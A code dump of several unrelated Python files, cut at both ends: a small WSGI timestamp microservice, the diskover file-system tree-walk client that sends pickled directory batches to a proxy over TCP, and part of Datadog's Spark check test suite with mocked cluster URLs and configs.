signal.signal(signal.SIGINT, node.shutdown)
rhc = threading.Thread(target=node.start)
rhc.start()
# wait for a signal to shutdown
while node.run:
signal.pause()
rhc.join()
|
simple_microservice_after.py
|
# -*- coding: utf-8 -*-
from datetime import datetime
import io
import os.path
import time
import threading
from wsgiref.validate import validator
from wsgiref.simple_server import make_server
EXCHANGE_FILE = "./exchange.dat"
def update_exchange_file():
"""
Writes the current date and time every 10 seconds into the exchange file.
The file is created if it does not exist.
"""
print("Will update to exchange file")
while True:
with io.open(EXCHANGE_FILE, "w") as f:
f.write(datetime.now().isoformat())
time.sleep(10)
def simple_app(environ, start_response):
"""
Read the content of the exchange file and return it.
"""
if not os.path.exists(EXCHANGE_FILE):
start_response(
'503 Service Unavailable',
[('Content-type', 'text/plain')]
)
return [b'Exchange file is not ready']
start_response('200 OK', [('Content-type', 'text/plain')])
with io.open(EXCHANGE_FILE) as f:
return [f.read().encode('utf-8')]
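# Quick manual check once the server below is running (assumed default host/port):
#   curl http://localhost:8080/
# returns the most recent timestamp written by update_exchange_file, or the
# 503 "Exchange file is not ready" response before the first write lands.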
if __name__ == '__main__':
    t = threading.Thread(target=update_exchange_file)
    t.daemon = True  # let the process exit even though the updater loops forever
    t.start()
httpd = make_server('', 8080, simple_app)
print("Listening on port 8080....")
try:
httpd.serve_forever()
except KeyboardInterrupt:
httpd.shutdown()
t.join(timeout=1)
|
diskover-treewalk-client.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""diskover - Elasticsearch file system crawler
diskover is a file system crawler that indexes
your file metadata into Elasticsearch.
See README.md or https://github.com/shirosaidev/diskover
for more information.
Copyright (C) Chris Park 2017-2018
diskover is released under the Apache 2.0 license. See
LICENSE for the full license text.
"""
import os
import sys
import pickle
import socket
import time
import struct
from threading import Thread
try:
from Queue import Queue
except ImportError:
from queue import Queue
from optparse import OptionParser
from multiprocessing import cpu_count
version = '1.0.19'
__version__ = version
IS_PY3 = sys.version_info >= (3, 0)
if IS_PY3:
unicode = str
parser = OptionParser(version="diskover tree walk client v %s" % version)
parser.add_option("-p", "--proxyhost", metavar="HOST",
help="Hostname or IP of diskover proxy socket server")
parser.add_option("-P", "--port", metavar="PORT", default=9998, type=int,
help="Port for diskover proxy socket server (default: 9998)")
parser.add_option("-b", "--batchsize", metavar="BATCH_SIZE", default=50, type=int,
help="Batchsize (num of directories) to send to diskover proxy (default: 50)")
parser.add_option("-n", "--numconn", metavar="NUM_CONNECTIONS", default=5, type=int,
help="Number of tcp connections to use (default: 5)")
parser.add_option("-t", "--twmethod", metavar="TREEWALK_METHOD", default="scandir",
help="Tree walk method to use. Options are: oswalk, scandir, pscandir, metaspider (default: scandir)")
parser.add_option("-r", "--rootdirlocal", metavar="ROOTDIR_LOCAL",
help="Local path on storage to crawl from")
parser.add_option("-R", "--rootdirremote", metavar="ROOTDIR_REMOTE",
help="Mount point directory for diskover and bots that is same location as rootdirlocal")
parser.add_option("-T", "--pscandirthreads", metavar="NUM_SCANDIR_THREADS", default=cpu_count()*2, type=int,
help="Number of threads for pscandir treewalk method (default: cpu core count x 2)")
parser.add_option("-s", "--metaspiderthreads", metavar="NUM_SPIDERS", default=cpu_count()*2, type=int,
help="Number of threads for metaspider treewalk method (default: cpu core count x 2)")
parser.add_option("-e", "--excludeddir", metavar="EXCLUDED_DIR", default=['.snapshot','.zfs'], action="append",
help="Additional directory to exclude (default: .snapshot .zfs)")
(options, args) = parser.parse_args()
options = vars(options)
if not options['proxyhost'] or not options['rootdirlocal'] or not options['rootdirremote']:
parser.error("missing required options, use -h for help")
HOST = options['proxyhost']
PORT = options['port']
BATCH_SIZE = options['batchsize']
NUM_CONNECTIONS = options['numconn']
TREEWALK_METHOD = options['twmethod']
ROOTDIR_LOCAL = unicode(options['rootdirlocal'])
ROOTDIR_REMOTE = unicode(options['rootdirremote'])
# remove any trailing slash from paths
if ROOTDIR_LOCAL != '/':
ROOTDIR_LOCAL = ROOTDIR_LOCAL.rstrip(os.path.sep)
if ROOTDIR_REMOTE != '/':
ROOTDIR_REMOTE = ROOTDIR_REMOTE.rstrip(os.path.sep)
NUM_SPIDERS = options['metaspiderthreads']
NUM_SCANDIR_THREADS = options['pscandirthreads']
EXCLUDED_DIRS = options['excludeddir']
q = Queue()
connections = []
totaldirs = 0
def send_one_message(sock, data):
length = len(data)
try:
sock.sendall(struct.pack('!I', length))
sock.sendall(data)
except socket.error as e:
print("Exception connecting to diskover socket server caused by %s, trying again..." % e)
time.sleep(2)
send_one_message(sock, data)
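# The wire format above is length-prefixed: a 4-byte big-endian unsigned int
# followed by the payload bytes. A minimal sketch of the matching receive side
# (an assumption about the proxy server, not taken from this file):
#   def recv_one_message(sock):
#       length = struct.unpack('!I', sock.recv(4))[0]
#       return sock.recv(length)  # a robust reader would loop until `length` bytes arrive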
def socket_worker(conn):
while True:
item = q.get()
send_one_message(conn, item)
q.task_done()
def spider_worker():
while True:
item = q_spider.get()
s = os.lstat(item)
mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime = s
blocks = s.st_blocks
q_spider_meta.put((item, (mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime, blocks)))
q_spider.task_done()
def scandirwalk_worker():
dirs = []
nondirs = []
while True:
path = q_paths.get()
try:
for entry in scandir(path):
if entry.is_dir(follow_symlinks=False):
dirs.append(entry.name)
elif entry.is_file(follow_symlinks=False):
nondirs.append(entry.name)
q_paths_results.put((path, dirs[:], nondirs[:]))
except (OSError, IOError) as e:
print("OS/IO Exception caused by: %s" % e)
pass
except Exception as e:
print("Exception caused by: %s" % e)
pass
del dirs[:]
del nondirs[:]
q_paths.task_done()
def scandirwalk(path):
q_paths.put(path)
while True:
entry = q_paths_results.get()
root, dirs, nondirs = entry
        # yield this directory's listing before queueing its subdirectories
        yield root, dirs, nondirs
        # queue subdirectories so the scandirwalk_worker threads pick them up
for name in dirs:
new_path = os.path.join(root, name)
q_paths.put(new_path)
q_paths_results.task_done()
if q_paths_results.qsize() == 0 and q_paths.qsize() == 0:
time.sleep(.5)
if q_paths_results.qsize() == 0 and q_paths.qsize() == 0:
break
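# Note: scandirwalk treats the walk as finished once both q_paths and
# q_paths_results stay empty across a 0.5 s recheck; this is a heuristic that
# assumes the worker threads refill the queues faster than that window.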
if __name__ == "__main__":
try:
banner = """\033[31m
__ __
/\ \ __ /\ \\
\_\ \/\_\ ____\ \ \/'\\ ___ __ __ __ _ __ //
/'_` \/\ \ /',__\\\ \ , < / __`\/\ \/\ \ /'__`\/\`'__\\ ('>
/\ \L\ \ \ \/\__, `\\\ \ \\\`\ /\ \L\ \ \ \_/ |/\ __/\ \ \/ /rr
\ \___,_\ \_\/\____/ \ \_\ \_\ \____/\ \___/ \ \____\\\ \\_\\ *\))_
\/__,_ /\/_/\/___/ \/_/\/_/\/___/ \/__/ \/____/ \\/_/
TCP Socket Treewalk Client v%s
https://shirosaidev.github.io/diskover
"It's time to see what lies beneath."
Support diskover on Patreon or PayPal :)\033[0m
""" % version
print(banner)
if TREEWALK_METHOD not in ["oswalk", "scandir", "pscandir", "metaspider"]:
print("Unknown treewalk method, methods are oswalk, scandir, pscandir, metaspider")
sys.exit(1)
starttime = time.time()
for i in range(NUM_CONNECTIONS):
try:
clientsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientsock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
clientsock.connect((HOST, PORT))
except socket.error as e:
print("Exception connecting to diskover socket server caused by %s" % e)
sys.exit(1)
connections.append(clientsock)
print("thread %s connected to socket server %s" % (i, clientsock.getsockname()))
t = Thread(target=socket_worker, args=(clientsock,))
t.daemon = True
t.start()
print("Starting tree walk... (ctrl-c to stop)")
packet = []
if TREEWALK_METHOD in ["oswalk", "scandir"]:
if TREEWALK_METHOD == "scandir":
try:
from scandir import walk
except ImportError:
print("scandir python module not found")
sys.exit(1)
else:
from os import walk
timestamp = time.time()
dircount = 0
dirlist = []
filelist = []
for root, dirs, files in walk(ROOTDIR_LOCAL):
dircount += 1
totaldirs += 1
# check if directory excluded and delete subdirs and files to not recurse down tree
if os.path.basename(root) in EXCLUDED_DIRS:
del dirs[:]
del files[:]
continue
# check for symlinks
for d in dirs:
if not os.path.islink(os.path.join(root, d)):
dirlist.append(d)
for f in files:
if not os.path.islink(os.path.join(root, f)):
filelist.append(f)
root = root.replace(ROOTDIR_LOCAL, ROOTDIR_REMOTE)
packet.append((root, dirlist[:], filelist[:]))
if len(packet) >= BATCH_SIZE:
q.put(pickle.dumps(packet))
del packet[:]
if time.time() - timestamp >= 2:
elapsed = round(time.time() - timestamp, 3)
dirspersec = round(dircount / elapsed, 3)
print("walked %s directories in 2 seconds (%s dirs/sec)" % (dircount, dirspersec))
timestamp = time.time()
dircount = 0
del dirlist[:]
del filelist[:]
q.put(pickle.dumps(packet))
elif TREEWALK_METHOD == "pscandir":
# parallel scandir
try:
from scandir import scandir
except ImportError:
print("scandir python module not found")
sys.exit(1)
q_paths = Queue()
q_paths_results = Queue()
for i in range(NUM_SCANDIR_THREADS):
t = Thread(target=scandirwalk_worker)
t.daemon = True
t.start()
timestamp = time.time()
dircount = 0
for root, dirs, files in scandirwalk(ROOTDIR_LOCAL):
dircount += 1
totaldirs += 1
# check if directory excluded and delete subdirs and files to not recurse down tree
if os.path.basename(root) in EXCLUDED_DIRS:
del dirs[:]
del files[:]
continue
root = root.replace(ROOTDIR_LOCAL, ROOTDIR_REMOTE)
packet.append((root, dirs[:], files[:]))
if len(packet) >= BATCH_SIZE:
q.put(pickle.dumps(packet))
del packet[:]
if time.time() - timestamp >= 2:
elapsed = round(time.time() - timestamp, 3)
dirspersec = round(dircount / elapsed, 3)
print("walked %s directories in 2 seconds (%s dirs/sec)" % (dircount, dirspersec))
timestamp = time.time()
dircount = 0
q.put(pickle.dumps(packet))
elif TREEWALK_METHOD == "metaspider":
# use threads to collect meta and send to diskover proxy rather than
# the bots scraping the meta
try:
from scandir import scandir, walk
except ImportError:
print("scandir python module not found")
sys.exit(1)
q_spider = Queue()
q_spider_meta = Queue()
for i in range(NUM_SPIDERS):
t = Thread(target=spider_worker)
t.daemon = True
t.start()
timestamp = time.time()
dircount = 0
filemeta = []
for root, dirs, files in walk(ROOTDIR_LOCAL):
dircount += 1
totaldirs += 1
if os.path.basename(root) in EXCLUDED_DIRS:
del dirs[:]
del files[:]
continue
for f in files:
q_spider.put(os.path.join(root, f))
q_spider.join()
while q_spider_meta.qsize() > 0:
item = q_spider_meta.get()
filemeta.append(item)
q_spider_meta.task_done()
mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime = os.lstat(root)
root = root.replace(ROOTDIR_LOCAL, ROOTDIR_REMOTE)
packet.append(((root, (mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime)), dirs[:], filemeta[:]))
if len(packet) >= BATCH_SIZE:
q.put(pickle.dumps(packet))
del packet[:]
if time.time() - timestamp >= 2:
elapsed = round(time.time() - timestamp, 3)
dirspersec = round(dircount / elapsed, 3)
print("walked %s directories in 2 seconds (%s dirs/sec)" % (dircount, dirspersec))
timestamp = time.time()
dircount = 0
del filemeta[:]
q.put(pickle.dumps(packet))
q.join()
elapsed = round(time.time() - starttime, 3)
dirspersec = round(totaldirs / elapsed, 3)
print("Finished tree walking, elapsed time %s sec, dirs walked %s (%s dirs/sec)" %
(elapsed, totaldirs, dirspersec))
for conn in connections:
print('closing connection', conn.getsockname())
conn.close()
# send kill signal to diskover proxy to trigger dir size updates
while True:
try:
print("sending shutdown signal to diskover proxy to start dir calcs...")
time.sleep(2)
clientsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientsock.connect((HOST, PORT))
send_one_message(clientsock, b'SIGKILL')
clientsock.close()
time.sleep(2)
clientsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientsock.connect((HOST, PORT))
send_one_message(clientsock, b'')
clientsock.close()
except socket.error:
print("diskover proxy received shutdown signal, exiting client")
sys.exit(0)
time.sleep(2)
except KeyboardInterrupt:
print("Ctrl-c keyboard interrupt, exiting...")
sys.exit(0)
|
test_spark.py
|
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import os
import ssl
import threading
import time
import mock
import pytest
import urllib3
from requests import RequestException
from six import iteritems
from six.moves import BaseHTTPServer
from six.moves.urllib.parse import parse_qsl, unquote_plus, urlencode, urljoin, urlparse, urlunparse
from datadog_checks.dev.http import MockResponse
from datadog_checks.spark import SparkCheck
from .common import CLUSTER_NAME, CLUSTER_TAGS, INSTANCE_DRIVER_1, INSTANCE_DRIVER_2, INSTANCE_STANDALONE
# IDs
YARN_APP_ID = 'application_1459362484344_0011'
SPARK_APP_ID = 'app_001'
APP_NAME = 'PySparkShell'
# URLs for cluster managers
SPARK_APP_URL = 'http://localhost:4040'
SPARK_YARN_URL = 'http://localhost:8088'
SPARK_MESOS_URL = 'http://localhost:5050'
STANDALONE_URL = 'http://localhost:8080'
# SSL test server
SSL_SERVER_PORT = 44443
SSL_SERVER_ADDRESS = 'localhost'
SSL_SERVER_URL = 'https://{}:{}'.format(SSL_SERVER_ADDRESS, SSL_SERVER_PORT)
# URL Paths
SPARK_REST_PATH = 'api/v1/applications'
YARN_APPS_PATH = 'ws/v1/cluster/apps'
MESOS_APPS_PATH = 'frameworks'
STANDALONE_APPS_PATH = 'json/'
STANDALONE_APP_PATH_HTML = 'app/'
VERSION_PATH = '/api/v1/version'
# Service Check Names
SPARK_SERVICE_CHECK = 'spark.application_master.can_connect'
YARN_SERVICE_CHECK = 'spark.resource_manager.can_connect'
MESOS_SERVICE_CHECK = 'spark.mesos_master.can_connect'
SPARK_DRIVER_SERVICE_CHECK = 'spark.driver.can_connect'
STANDALONE_SERVICE_CHECK = 'spark.standalone_master.can_connect'
TEST_USERNAME = 'admin'
TEST_PASSWORD = 'password'
CUSTOM_TAGS = ['optional:tag1']
COMMON_TAGS = [
'app_name:' + APP_NAME,
] + CLUSTER_TAGS
def join_url_dir(url, *args):
"""
Join a URL with multiple directories
"""
for path in args:
url = url.rstrip('/') + '/'
url = urljoin(url, path.lstrip('/'))
return url
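# Illustrative sketch (hypothetical values):
#   join_url_dir('http://host:8088', 'proxy', 'app_1', 'api/v1/applications')
#   # -> 'http://host:8088/proxy/app_1/api/v1/applications'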
class Url(object):
"""A url object that can be compared with other url orbjects
without regard to the vagaries of encoding, escaping, and ordering
of parameters in query strings."""
def __init__(self, url):
parts = urlparse(url)
_query = frozenset(parse_qsl(parts.query))
_path = unquote_plus(parts.path)
parts = parts._replace(query=_query, path=_path)
self.parts = parts
def __eq__(self, other):
return self.parts == other.parts
def __hash__(self):
return hash(self.parts)
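# Illustrative sketch (hypothetical values): URLs that differ only in query
# ordering and percent-encoding compare equal under Url:
#   Url('http://host/a%20b?x=1&y=2') == Url('http://host/a b?y=2&x=1')  # True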
# PATH to Spark Version
VERSION_PATH = Url(urljoin(SPARK_APP_URL, VERSION_PATH))
# YARN Service URLs
YARN_APP_URL = Url(urljoin(SPARK_YARN_URL, YARN_APPS_PATH) + '?states=RUNNING&applicationTypes=SPARK')
YARN_SPARK_APP_URL = Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH))
YARN_SPARK_JOB_URL = Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'jobs'))
YARN_SPARK_STAGE_URL = Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'stages'))
YARN_SPARK_EXECUTOR_URL = Url(
join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'executors')
)
YARN_SPARK_RDD_URL = Url(
join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'storage/rdd')
)
YARN_SPARK_STREAMING_STATISTICS_URL = Url(
join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, SPARK_REST_PATH, SPARK_APP_ID, 'streaming/statistics')
)
YARN_SPARK_METRICS_JSON_URL = Url(join_url_dir(SPARK_YARN_URL, 'proxy', YARN_APP_ID, 'metrics/json'))
# Mesos Service URLs
MESOS_APP_URL = Url(urljoin(SPARK_MESOS_URL, MESOS_APPS_PATH))
MESOS_SPARK_APP_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH))
MESOS_SPARK_JOB_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'jobs'))
MESOS_SPARK_STAGE_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'stages'))
MESOS_SPARK_EXECUTOR_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'executors'))
MESOS_SPARK_RDD_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'storage/rdd'))
MESOS_SPARK_STREAMING_STATISTICS_URL = Url(
join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'streaming/statistics')
)
MESOS_SPARK_METRICS_JSON_URL = Url(join_url_dir(SPARK_APP_URL, 'metrics/json'))
# Driver Service URLs
DRIVER_APP_URL = Url(urljoin(SPARK_APP_URL, SPARK_REST_PATH))
DRIVER_SPARK_APP_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH))
DRIVER_SPARK_JOB_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'jobs'))
DRIVER_SPARK_STAGE_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'stages'))
DRIVER_SPARK_EXECUTOR_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'executors'))
DRIVER_SPARK_RDD_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'storage/rdd'))
DRIVER_SPARK_STREAMING_STATISTICS_URL = Url(
join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'streaming/statistics')
)
DRIVER_SPARK_METRICS_JSON_URL = Url(join_url_dir(SPARK_APP_URL, 'metrics/json'))
# Spark Standalone Service URLs
STANDALONE_APP_URL = Url(urljoin(STANDALONE_URL, STANDALONE_APPS_PATH))
STANDALONE_APP_HTML_URL = Url(urljoin(STANDALONE_URL, STANDALONE_APP_PATH_HTML) + '?appId=' + SPARK_APP_ID)
STANDALONE_SPARK_APP_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH))
STANDALONE_SPARK_JOB_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'jobs'))
STANDALONE_SPARK_STAGE_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'stages'))
STANDALONE_SPARK_EXECUTOR_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'executors'))
STANDALONE_SPARK_RDD_URL = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'storage/rdd'))
STANDALONE_SPARK_STREAMING_STATISTICS_URL = Url(
join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, SPARK_APP_ID, 'streaming/statistics')
)
STANDALONE_SPARK_METRICS_JSON_URL = Url(join_url_dir(SPARK_APP_URL, 'metrics/json'))
STANDALONE_SPARK_JOB_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'jobs'))
STANDALONE_SPARK_STAGE_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'stages'))
STANDALONE_SPARK_EXECUTOR_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'executors'))
STANDALONE_SPARK_RDD_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'storage/rdd'))
STANDALONE_SPARK_STREAMING_STATISTICS_URL_PRE20 = Url(
join_url_dir(SPARK_APP_URL, SPARK_REST_PATH, APP_NAME, 'streaming/statistics')
)
STANDALONE_SPARK_METRICS_JSON_URL_PRE20 = Url(join_url_dir(SPARK_APP_URL, 'metrics/json'))
FIXTURE_DIR = os.path.join(os.path.dirname(__file__), 'fixtures')
CERTIFICATE_DIR = os.path.join(os.path.dirname(__file__), 'certificate')
def yarn_requests_get_mock(url, *args, **kwargs):
arg_url = Url(url)
if arg_url == YARN_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'yarn_apps'))
elif arg_url == YARN_SPARK_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_apps'))
elif arg_url == YARN_SPARK_JOB_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'job_metrics'))
elif arg_url == YARN_SPARK_STAGE_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'stage_metrics'))
elif arg_url == YARN_SPARK_EXECUTOR_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'executor_metrics'))
elif arg_url == YARN_SPARK_RDD_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'rdd_metrics'))
elif arg_url == YARN_SPARK_STREAMING_STATISTICS_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'streaming_statistics'))
elif arg_url == YARN_SPARK_METRICS_JSON_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'metrics_json'))
def yarn_requests_auth_mock(*args, **kwargs):
# Make sure we're passing in authentication
assert 'auth' in kwargs, "Error, missing authentication"
# Make sure we've got the correct username and password
assert kwargs['auth'] == (TEST_USERNAME, TEST_PASSWORD), "Incorrect username or password"
# Return mocked request.get(...)
return yarn_requests_get_mock(*args, **kwargs)
def mesos_requests_get_mock(url, *args, **kwargs):
arg_url = Url(url)
if arg_url == MESOS_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'mesos_apps'))
elif arg_url == MESOS_SPARK_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_apps'))
elif arg_url == MESOS_SPARK_JOB_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'job_metrics'))
elif arg_url == MESOS_SPARK_STAGE_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'stage_metrics'))
elif arg_url == MESOS_SPARK_EXECUTOR_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'executor_metrics'))
elif arg_url == MESOS_SPARK_RDD_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'rdd_metrics'))
elif arg_url == MESOS_SPARK_STREAMING_STATISTICS_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'streaming_statistics'))
elif arg_url == MESOS_SPARK_METRICS_JSON_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'metrics_json'))
def driver_requests_get_mock(url, *args, **kwargs):
arg_url = Url(url)
if arg_url == DRIVER_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_apps'))
elif arg_url == DRIVER_SPARK_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_apps'))
elif arg_url == DRIVER_SPARK_JOB_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'job_metrics'))
elif arg_url == DRIVER_SPARK_STAGE_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'stage_metrics'))
elif arg_url == DRIVER_SPARK_EXECUTOR_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'executor_metrics'))
elif arg_url == DRIVER_SPARK_RDD_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'rdd_metrics'))
elif arg_url == DRIVER_SPARK_STREAMING_STATISTICS_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'streaming_statistics'))
elif arg_url == DRIVER_SPARK_METRICS_JSON_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'metrics_json'))
def standalone_requests_get_mock(url, *args, **kwargs):
arg_url = Url(url)
if arg_url == STANDALONE_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_standalone_apps'))
elif arg_url == STANDALONE_APP_HTML_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_standalone_app'))
elif arg_url == STANDALONE_SPARK_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_apps'))
elif arg_url == STANDALONE_SPARK_JOB_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'job_metrics'))
elif arg_url == STANDALONE_SPARK_STAGE_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'stage_metrics'))
elif arg_url == STANDALONE_SPARK_EXECUTOR_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'executor_metrics'))
elif arg_url == STANDALONE_SPARK_RDD_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'rdd_metrics'))
elif arg_url == STANDALONE_SPARK_STREAMING_STATISTICS_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'streaming_statistics'))
elif arg_url == STANDALONE_SPARK_METRICS_JSON_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'metrics_json'))
def standalone_requests_pre20_get_mock(url, *args, **kwargs):
arg_url = Url(url)
if arg_url == STANDALONE_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_standalone_apps'))
elif arg_url == STANDALONE_APP_HTML_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_standalone_app'))
elif arg_url == STANDALONE_SPARK_APP_URL:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'spark_apps_pre20'))
elif arg_url == STANDALONE_SPARK_JOB_URL:
return MockResponse(status_code=404)
elif arg_url == STANDALONE_SPARK_STAGE_URL:
return MockResponse(status_code=404)
elif arg_url == STANDALONE_SPARK_EXECUTOR_URL:
return MockResponse(status_code=404)
elif arg_url == STANDALONE_SPARK_RDD_URL:
return MockResponse(status_code=404)
elif arg_url == STANDALONE_SPARK_STREAMING_STATISTICS_URL:
return MockResponse(status_code=404)
elif arg_url == STANDALONE_SPARK_JOB_URL_PRE20:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'job_metrics'))
elif arg_url == STANDALONE_SPARK_STAGE_URL_PRE20:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'stage_metrics'))
elif arg_url == STANDALONE_SPARK_EXECUTOR_URL_PRE20:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'executor_metrics'))
elif arg_url == STANDALONE_SPARK_RDD_URL_PRE20:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'rdd_metrics'))
elif arg_url == STANDALONE_SPARK_STREAMING_STATISTICS_URL_PRE20:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'streaming_statistics'))
elif arg_url == VERSION_PATH:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'version'))
elif arg_url == STANDALONE_SPARK_METRICS_JSON_URL_PRE20:
return MockResponse(file_path=os.path.join(FIXTURE_DIR, 'metrics_json'))
def proxy_with_warning_page_mock(url, *args, **kwargs):
cookies = kwargs.get('cookies') or {}
proxy_cookie = cookies.get('proxy_cookie')
url_parts = list(urlparse(url))
query = dict(parse_qsl(url_parts[4]))
if proxy_cookie and query.get('proxyapproved') == 'true':
del query['proxyapproved']
url_parts[4] = urlencode(query)
return standalone_requests_get_mock(urlunparse(url_parts), *args[1:], **kwargs)
else:
# Display the html warning page with the redirect link
query['proxyapproved'] = 'true'
url_parts[4] = urlencode(query)
with open(os.path.join(FIXTURE_DIR, 'html_warning_page'), 'r') as f:
body = f.read().replace('$REDIRECT_URL$', urlunparse(url_parts))
return MockResponse(body, cookies={'proxy_cookie': 'foo'})
CHECK_NAME = 'spark'
YARN_CONFIG = {
'spark_url': 'http://localhost:8088',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_yarn_mode',
'executor_level_metrics': True,
'tags': list(CUSTOM_TAGS),
}
YARN_AUTH_CONFIG = {
'spark_url': 'http://localhost:8088',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_yarn_mode',
'executor_level_metrics': True,
'tags': list(CUSTOM_TAGS),
'username': TEST_USERNAME,
'password': TEST_PASSWORD,
}
MESOS_CONFIG = {
'spark_url': 'http://localhost:5050',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_mesos_mode',
'executor_level_metrics': True,
'tags': list(CUSTOM_TAGS),
}
MESOS_FILTERED_CONFIG = {
'spark_url': 'http://localhost:5050',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_mesos_mode',
'executor_level_metrics': True,
'spark_ui_ports': [1234],
}
DRIVER_CONFIG = {
'spark_url': 'http://localhost:4040',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_driver_mode',
'executor_level_metrics': True,
'tags': list(CUSTOM_TAGS),
}
STANDALONE_CONFIG = {
'spark_url': 'http://localhost:8080',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode',
'executor_level_metrics': True,
}
STANDALONE_CONFIG_PRE_20 = {
'spark_url': 'http://localhost:8080',
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode',
'executor_level_metrics': True,
'spark_pre_20_mode': 'true',
}
SSL_CONFIG = {
